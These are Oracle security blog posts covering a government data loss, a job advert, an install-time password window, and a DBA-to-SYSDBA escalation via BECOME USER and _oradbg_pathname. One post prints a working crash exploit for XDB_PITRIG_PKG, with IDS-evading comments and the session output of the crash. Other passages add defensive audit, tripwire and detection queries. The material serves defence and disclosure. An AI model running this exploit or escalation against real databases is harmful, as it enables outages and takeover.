Pete Finnigan's Oracle Security Weblog

This is the weblog for Pete Finnigan. Pete works in the area of Oracle security and he specialises in auditing Oracle databases for security issues. This weblog is aimed squarely at those interested in the security of their Oracle databases.

Eight ways to hack Oracle

I thought when I started my own company again I would have had time to spend updating my website and posting to my blog, at least under the guise of marketing; so far no such luck. I am very busy with work, also with my new training courses, and also I have spent every spare late-evening hour recently completing my presentations for the UKOUG conference in one week's time. Details for my presentations (Oracle forensics, Oracle security tools, an Oracle security round table and also a two hour Oracle security master class) are available on my home page. I have posted the slides for the master class, the security tools and the round table to the UKOUG. I will complete the Oracle forensics paper tomorrow evening, I hope. I am really looking forward to the conference this year and catching up with lots of people. I am going down on the train from York every day this year to Birmingham to avoid the hideous experience I had with a bad hotel last year. I booked the tickets a long time ago and it's really good value compared to a hotel, and I am planning to get some work done on the train as well.

I also have a number of presentations coming up in the new year. I have just been asked to speak at the UNIX SIG in January about real world use of VPD, so that should be fun. I am also going to speak at a white-hats event in March, not sure of the exact title yet.

I have quite a backlog of stuff to talk about here that hopefully I will get around to once the presentation writing phase is over. I also have some research topics planned and also some updates needed for the site to describe and add services, partnerships and more; for the business that's more important so will get done first.

OK. Some Oracle security. I found a new paper by Sean Hull the other day called Eight Ways to Hack Oracle. This is a good summary of some of the key problems with security in Oracle databases.

I also just downloaded a PDF of a new Oracle security book from Syngress; I have only skimmed it so far. I will give some comments here later in the week on that.

Personal details for 25 Million people go missing in the UK

To say I was shocked is an understatement. I was completely gob-smacked that a UK government agency can spend (presumably) millions of our IT pounds storing and using our personal data and then proceed to take it out of its secure IT centres and away from the application protections, audit trails and procedures, put the data onto CDs (all of our personal data) and post it to the National Audit Office. To say it's the fault of a junior member of staff may be true in a literal sense, but presumably someone asked him to send this data to the NAO? He would not have just decided to do it all on his own. Also, why is a junior member of staff allowed to access all of the data, and why is he allowed to download it from the HMRC systems and put it onto CDs? The fact that this was done and seems to be a planned action points at support people who have high levels of access.

The BBC has a nice timeline of events in a page, "Lost CD's - Sequence of events", and also a write-up of the events in a story, "Brown apologises for records loss".

I personally am angry, as my children get child benefit along with almost all other children in the UK; now my details that I entrusted to the government are floating around an office, post office or who knows where, waiting for someone to get at them.

The timeline above is amazing. It states that the first set of two disks with password protected records (what is used? MS Excel password, WinZip, what?) went missing and when the package failed to arrive they sent a second one. This is in addition to the record that a junior official (it doesn't say if it's the same one) sent a full copy of HMRC child benefit data to the NAO; it goes on to say that that data is returned. Does this mean the CDs were posted back? If so, how do we know that the data was wiped from everywhere it was written to at the NAO?

To download all of this data once and write it to CDs is bad, but to do it again and again is crazy. How does a junior official get access to a system to download all the personal details and then write them to CD in the first place?

The moral of this story? Database security is complex; it's complicated to design, to implement, to harden existing systems and more, but the data has no security at all if you take it from the databases and away from the RBAC, the audit trails and the procedures and write it to CD or disc or any other medium. It bypasses the security completely.

I have to ask another question. If this action had not gone wrong and the CDs had arrived, presumably someone in the NAO loaded the data onto other systems. Who controls the CDs, where would they be kept, would they be destroyed, what about the data on the NAO analysts' machines, how is that protected (MS Excel password?), how long is it kept, how is it destroyed?

There are so many questions. This is why database security is so important: our personal details, NINO, bank accounts, names, children's names and more should be held in secure databases and audited, protected with strong RBAC, accessed by authenticated and authorised users only and much more. My data and that of every other parent in the UK should not be taken from the secure database and applications and sent to anyone on a CD. There is no security whatsoever on a CD that is password protected.

As I said - gob-smacked!!!

Would you like a job in Oracle security - PeteFinnigan.com Limited is hiring

Due to unprecedented success in our company since I re-started it last August ( see Pete Finnigan is now an independent and available for Oracle security work ) we are looking to hire someone to help me deliver Oracle Security consultancy, training, products and associated services.

I am looking for someone with energy and excitement for database security, someone who knows Oracle database technology well already. You don't need to be a DBA or a developer but you must understand the complete architecture and how the products tick. This is important; let me give an example. To provide security services it's not enough to simply tick the boxes and check parameters; you need to understand how those parameters affect the database and the applications running on it. Why do you need to know? Because every installation is different and every application working with the database is different. So you find a parameter that's not set to a secure value; in some cases it's not a simple case of setting it to its known secure value, as this has been known to break applications (let's not get into the whys and wherefores of whether that's good design or bad!), so you need to know how Oracle works so that alternative mitigating counter-measures can be suggested, designed and deployed as well, for the best solutions for our customers.

I am looking for someone who knows Oracle well; but also someone who knows security and understands security ideally in the Oracle database environment. Secondary to this is the need to understand the security features provided by the Oracle database product set.

The job will also include the opportunity to write papers for speaking events, writing for this blog; therefore writing skills are important but for me the more important thing is passion for learning and passion for what we are doing and I am willing to train and bring up to speed the right person.

The job will also entail all types of Oracle security based consultancy; security audits, design work, specialist work around things like VPD, OLS, ASO, design of audit trails, Oracle database breach investigations and much more. It will also involve pre-sales, proposal writing, teaching and products.

Ideally I am looking for someone based in the north of England but don't let this limit you, I am not asking you to move house as the business we have is very spread out and we need to go where the client is but being closer to our base would make communications easier.

You must already have the right to work in the UK; in the future we may relax this but at the moment we cannot afford the effort to help with business visas etc. to bring anyone in from abroad.

I believe that this is a great opportunity for someone out there, all you need to do is email me on pete _at_ petefinnigan _dot_ com with your CV and we can arrange a first interview.

Please no agencies, you will be wasting your time as well as mine as I will not respond to any agencies, I want to talk to individuals directly.

10g and 11g password leak during install, honeypots and databases exposed to the internet

David has been busy. He posted a vulnerability he has found in 10gR2 and 11gR1 during the week to the bugtraq security mailing list. The post is titled Oracle 11g/10g Installation Vulnerability. This is an interesting issue that is time based. David found that the database has the default passwords for SYS and SYSTEM for a short period until later in the install when they are changed to the chosen values. The time window available is based on the features chosen. David mentions some times in his blog but these are meaningless really as they are on his machine / OS / database feature combination. Of course everyone's hardware / software setups are different but there is still an issue, as the database could be compromised during an installation. What David doesn't mention is why. My guess from this description without testing (I don't have enough time to do an install, too much work to do, hence not much blogging recently!) is that this occurs when you choose a seed database. This would be logical and would explain how the users could have their defaults. I have always recommended to all clients that they don't use the DBCA and instead create a database from first principles using the CREATE DATABASE command. This presumably would not have this issue.

In looking at David's post I noticed another entry in his blog titled Database Tripwires.... This has the same mix-up between fine grained audit and fine grained access control as the Oracle Hacker's Handbook; I guess this time it's a slip-up :-). The interesting idea is in the next paragraph below that one, which suggests the use of a view that calls a function to use it as a select trigger. If you set up a function that does the work of a trigger, i.e. records something or sends a message, and then ensure that the function is called every time the view is selected from, then this simulates a select trigger. I like this idea.
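The view-plus-function "select trigger" described above, as an added worked example in PL/SQL (not David's or Pete's code). The object names are hypothetical: APP.SALARIES is the table being watched, APP.SALARIES_V is the view users are granted, SEC.SELECT_TRIPWIRE is the logging function and SEC.SELECT_AUDIT_LOG holds the events.

```sql
-- Added example, not from the original post. Names are hypothetical.
-- Table that receives one row per detected SELECT against the view.
CREATE TABLE sec.select_audit_log (
  logged_at   TIMESTAMP DEFAULT SYSTIMESTAMP,
  db_user     VARCHAR2(30),
  os_user     VARCHAR2(64),
  machine     VARCHAR2(64),
  module      VARCHAR2(64),
  object_name VARCHAR2(61)
);

-- The function does the trigger's work: it records who is reading.
-- AUTONOMOUS_TRANSACTION commits the audit row independently of the
-- caller, so a ROLLBACK by the reader cannot remove the evidence.
CREATE OR REPLACE FUNCTION sec.select_tripwire(p_object IN VARCHAR2)
  RETURN NUMBER
IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  INSERT INTO sec.select_audit_log
    (db_user, os_user, machine, module, object_name)
  VALUES
    (SYS_CONTEXT('USERENV', 'SESSION_USER'),
     SYS_CONTEXT('USERENV', 'OS_USER'),
     SYS_CONTEXT('USERENV', 'HOST'),
     SYS_CONTEXT('USERENV', 'MODULE'),
     p_object);
  COMMIT;
  RETURN 1;
END select_tripwire;
/

-- The view calls the function in its WHERE clause, so every query that
-- touches the view evaluates it. The predicate is always true, so the
-- result set is unchanged; only the side effect (the log row) is added.
CREATE OR REPLACE VIEW app.salaries_v AS
  SELECT s.emp_id, s.salary
  FROM   app.salaries s
  WHERE  sec.select_tripwire('APP.SALARIES') = 1;

-- Readers get the view only; direct access to the base table is what
-- would let them bypass the tripwire.
GRANT SELECT ON app.salaries_v TO app_reader;
```

Two caveats a practitioner should keep in mind: the optimizer decides whether a function with constant arguments is evaluated once per statement or once per row, so expect one or many log rows per query, and never rely on the count. Also, OS_USER, HOST and MODULE are supplied by the client and can be set to anything, so treat them as hints and SESSION_USER as the only authenticated value.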

Finally, David sent me an advance copy of his database survey earlier in the week that shows how many databases are exposed directly to the internet. This is a very interesting paper and shows that the numbers are up overall from the first survey done 2 years ago; this is a bad trend I guess, as the number of databases (SQL Server and Oracle) exposed to the internet without a firewall is growing. The paper shows that the number of Oracle servers has dropped and that SQL Server has therefore taken the brunt of the increase. Why? Maybe because of the proliferation of free SQL Server installs on desktops, maybe because Visual Express also gives away SQL Server, maybe because Microsoft have updated their free database, whereas Oracle have not. Robert McMillan has also seen a copy of David's paper and has written about it in a news item called Researcher: Half a million database servers have no firewall - Two years after first Database Exposure Survey, the situation's worse than ever. David should release the paper on his database security web site.

Oracle 0-day bug to get SYSDBA access to the database

Tanel Poder has made an excellent post to his blog titled Oracle Security: All your DBAs are SYSDBAs and can have full OS access. This post details Tanel's recent discovery that a user who has the DBA role or IMP_FULL_DATABASE can become a SYSDBA and access the operating system, alter audit trails, alter the Oracle binary after setting _disable_image_check = true, or be able to set a dedicated server process to run as SYSDBA through the debugger by flipping the bit that signifies that the process is running as a SYSDBA one. This is all based on the BECOME USER privilege that I have spoken about on this site in the past. A UPI call is available from the client side to utilize the BECOME USER privilege used by import or the Oracle data pump to change users. A new package KUPP$PROC.CHANGE_USER can also be used to change users and use the BECOME USER privilege.

Tanel's post shows how someone with BECOME USER and CREATE SESSION could change schema/user to SYS and grant DBA. Unfortunately this does not give you the right to grant SYSDBA, but Tanel has a great way to do that: he uses ALTER SESSION to change the _oradbg_pathname hidden parameter to a command to flip the SYSDBA bit in the PGA for a dedicated server process and then uses the debug event to run it. He can then grant SYSDBA to another user, shut down the database or more. Tanel provides examples for Solaris with mdb and Linux with gdb.
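What a DBA can do about this today is know who holds the privileges Tanel's path depends on and whether the two hidden parameters have been touched. The review queries below are an added example (not Tanel's or Pete's code); they assume you run them as SYS, since the X$ fixed tables are not visible to anyone else.

```sql
-- Added example, not from the original post. Run as SYS.

-- 1. Direct holders of BECOME USER (the privilege the whole chain rests on).
SELECT grantee, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'BECOME USER'
ORDER  BY grantee;

-- 2. Indirect holders: BECOME USER comes with DBA and IMP_FULL_DATABASE.
--    DBA_ROLE_PRIVS shows direct role grants only; follow nested grants
--    through ROLE_ROLE_PRIVS if your roles are layered.
SELECT grantee, granted_role, admin_option
FROM   dba_role_privs
WHERE  granted_role IN ('DBA', 'IMP_FULL_DATABASE')
ORDER  BY granted_role, grantee;

-- 3. Who can execute the package that exposes the change-user call.
SELECT grantee, privilege
FROM   dba_tab_privs
WHERE  owner = 'SYS'
AND    table_name = 'KUPP$PROC';

-- 4. Current value of the two hidden parameters the post changes.
--    Expected: _oradbg_pathname at its default (empty) and
--    _disable_image_check FALSE; anything else deserves an explanation.
SELECT i.ksppinm  AS name,
       v.ksppstvl AS value,
       v.ksppstdf AS is_default
FROM   x$ksppi  i,
       x$ksppcv v
WHERE  i.indx = v.indx
AND    i.ksppinm IN ('_oradbg_pathname', '_disable_image_check')
ORDER  BY i.ksppinm;
```

Query 4 reads the session-level view of the parameters for the SYS session running it; because Tanel's post sets _oradbg_pathname with ALTER SESSION, a change made in another session will not show here, so the complementary control is auditing ALTER SESSION and watching the alert log for debug events.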

Nice post, very detailed and very internal and clever.

Pete Finnigan Oracle 11g Security presentation slides available

I talked yesterday at the UKOUG DBMS SIG in Chesford Grange (Le Meridien Warwick), which is very close to Warwick. The conference was very good in my opinion, with lots of interaction and good discussion. I also particularly liked Julian's talk about investigating Oracle, very interesting, particularly the hint at the special C SGA programs he uses to investigate the SGA. My own presentation was about Oracle 11g Security and what's new in 11g, what's worse, what's subtly changed and also particularly how Oracle have made great strides in improving the features to solve some of the key issues once and for all.

My paper has been added to my Oracle Security white papers page as two versions. Both are pdf and one is one slide per page and the other has 6 slides per page. The Oracle 11g Security paper is here (full, 1.2 Meg) and the Oracle 11g Security paper (6 slides per page - 240K) version is here.

Exploit code to crash an Oracle database posted

Last Friday someone calling themselves oraclefun at hushmail dot com posted an exploit for the Oracle database using the package XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA. No versions were given as to which are vulnerable, but Alex posted in his blog that unpatched 10.2.0.1 and 10.2.0.2 systems are affected and crash. I tested this on an unpatched 10.2.0.1 database:


SQL> grant create session to x identified by x;

Grant succeeded.

SQL> connect x/x
Connected.
SQL> edit
Wrote file afiedt.buf

1 -- Utility to free Oracle memory
2 declare
3 larry varchar2(32767);
4 mary varchar2(32767);
5 begin
6 larry:='larryellison';
7 larry:=larry||larry;
8 larry:=larry||larry;
9 larry:=larry||larry;
10 larry:=larry||larry;
11 larry:=larry||larry;
12 larry:=larry||larry;
13 larry:=larry||larry;
14 mary:='maryann';
15 mary:=mary||mary;
16 mary:=mary||mary;
17 mary:=mary||mary;
18 mary:=mary||mary;
19 mary:=mary||mary;
20 mary:=mary||mary;
21 mary:=mary||mary;
22 mary:=mary||mary;
23 xDb
24 /*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(mary
25 , larry);
26* end;
SQL> /
declare
*
ERROR at line 2:
ORA-03135: connection lost contact


SQL> connect system/manager
ERROR:
ORA-12514: TNS:listener does not currently know of service requested in connect
descriptor


SQL> connect system/manager
Connected.
SQL>


As you can see, running this Oracle exploit code causes the connection to the database to be lost. This in fact has crashed the database. I had to restart the database:

Oracle 10gR2 exploit for XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA

The interesting thing with this exploit is that it uses some IDS evasion techniques. It uses case changes (xDb) and embedded comments (/*Mary*/, /*And*/, /**/) between the tokens of the package name to throw off IDS and IPS software that use simple substring rules to detect this type of attack.
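The defence against that evasion is to normalise the statement text before matching it against a signature: strip the comments, drop the whitespace, fold the case, and only then look for the package name. The query below is an added example (not the exploit author's, Alex's or Pete's code) that applies those steps to the text Oracle keeps in V$SQL; it assumes 10gR2 or later for the non-greedy `*?` operator in REGEXP_REPLACE, and that the statement fits in the 1000 characters of SQL_TEXT (use SQL_FULLTEXT for longer ones).

```sql
-- Added example, not from the original post.
-- Normalise cached SQL text, then match the package name that the
-- exploit splits up with comments and case changes.
SELECT s.sql_id,
       s.parsing_schema_name,
       s.first_load_time,
       s.sql_text
FROM   v$sql s
WHERE  INSTR(
         -- step 3: fold case, so xDb and XDB compare equal
         UPPER(
           -- step 2: remove all whitespace, including the newline the
           --         exploit places between xDb and the first comment
           REGEXP_REPLACE(
             -- step 1: remove /* ... */ comments; non-greedy so each
             --         comment is removed on its own, 'n' lets '.' span
             --         newlines inside a comment
             REGEXP_REPLACE(s.sql_text, '/\*.*?\*/', '', 1, 0, 'n'),
             '[[:space:]]+', '')
         ),
         'XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA') > 0;
```

Applied to the block in the transcript above, step 1 turns `xDb /*Mary*/./*And*/XDB_PITRIG_PKG/*Larry*/./**/PITRIG_DROPMETADATA(` into `xDb .XDB_PITRIG_PKG.PITRIG_DROPMETADATA(`, step 2 closes the gap and step 3 gives `XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(`, which the plain INSTR now finds. One caveat: because this particular statement crashes the instance, the shared pool it was parsed in does not survive, so V$SQL helps on instances that were probed but not taken down; the same three normalisation steps are what a network IDS rule or an audit trail search (SQL_TEXT in DBA_AUDIT_TRAIL with AUDIT_TRAIL=DB,EXTENDED) needs to apply.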

Pete Finnigan speaking about Oracle 11g Security tomorrow at UKOUG DBMS SIG

I will be off down to Chesford Grange (Le Meridien Warwick) tomorrow to speak at the UKOUG DBMS SIG with a paper titled http://www.ukoug.org/calendar/show_presentation.jsp?id=7971 - (broken link) Oracle11g Security Features that will overview the main new security features in Oracle 11g as well as look at some of the key security problems affecting Oracle databases and how 11g has made great progress to address some of these. I will also touch upon some of the things that haven't been documented but are still security improvements, as well as show some detailed examples of some of the features such as password related issues, the new fine grained network controls for packages and more. I will post the slides up after the event on this site. If anyone is able to come down there tomorrow, come and say hello!

DBMS_SQL new security features and ROWID hacking

I saw that David had made a couple of good posts to his blog in the last couple of days. The first is about the hidden parameter _dbms_sql_security_level being added to help control the use of the DBMS_SQL package and also to prevent cursor injection or cursor snarfing by adding security levels, checking effective and actual user IDs and also now generating random cursor IDs to prevent prediction. These are great improvements to this area that effectively close out a major security hole. David's blog is titled Oracle 11g DBMS_SQL Security Changes.

David's second interesting post is titled 0wned by the lowly Oracle rowid pseudo function? and discusses the use of the ROWID function to predict information that is there but is perhaps not visible because of the use of VPD. This could undermine VPD in some circumstances but would require predictable other data to enable someone with SQL access to use the ROWID function to predict missing records. What is interesting about this post is that it uses the same method I suggested around 4 years ago but from another angle. I used it in Oracle forensics to show how a deleted record from SYS.AUD$ could be identified and also how altered records showed up in the same table when comparing the ROWID and also the timestamps.
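The forensic side of the ROWID idea, as an added example (not David's or Pete's code): decompose each audit record's ROWID into file, block and slot, walk the rows in that physical order, and flag where the timestamps disagree with it. It assumes a 10g-style SYS.AUD$ with the NTIMESTAMP# column and is run as SYS; the two flags are heuristics, because a legitimate audit purge also leaves slot gaps.

```sql
-- Added example, not from the original post. Run as SYS.
-- AUD$ is normally append-only, so within a block the slot order should
-- match the time order. Rows that break that expectation are worth a look.
WITH aud AS (
  SELECT DBMS_ROWID.ROWID_RELATIVE_FNO(a.rowid) AS fno,
         DBMS_ROWID.ROWID_BLOCK_NUMBER(a.rowid) AS blk,
         DBMS_ROWID.ROWID_ROW_NUMBER(a.rowid)   AS slot,
         a.sessionid,
         a.entryid,
         a.userid,
         a.ntimestamp#
  FROM   sys.aud$ a
)
SELECT fno, blk, slot, sessionid, entryid, userid, ntimestamp#,
       CASE
         -- This row's timestamp is earlier than the row in the previous
         -- slot of the same block: either it was inserted later into a
         -- slot freed by a delete, or its timestamp was edited.
         WHEN ntimestamp# < LAG(ntimestamp#)
                              OVER (PARTITION BY fno, blk ORDER BY slot)
           THEN 'OUT OF ORDER'
         -- A missing slot number inside a block: whatever occupied the
         -- missing slot is no longer there (deleted or purged).
         WHEN slot - LAG(slot)
                       OVER (PARTITION BY fno, blk ORDER BY slot) > 1
           THEN 'SLOT GAP'
       END AS suspect
FROM   aud
ORDER  BY fno, blk, slot;
```

On a large audit table constrain the CTE to the blocks or time window under investigation rather than scanning all of AUD$, and compare any SLOT GAP against the purge schedule before treating it as evidence; the OUT OF ORDER flag is the stronger signal, since nothing in normal operation writes an older timestamp into a later slot.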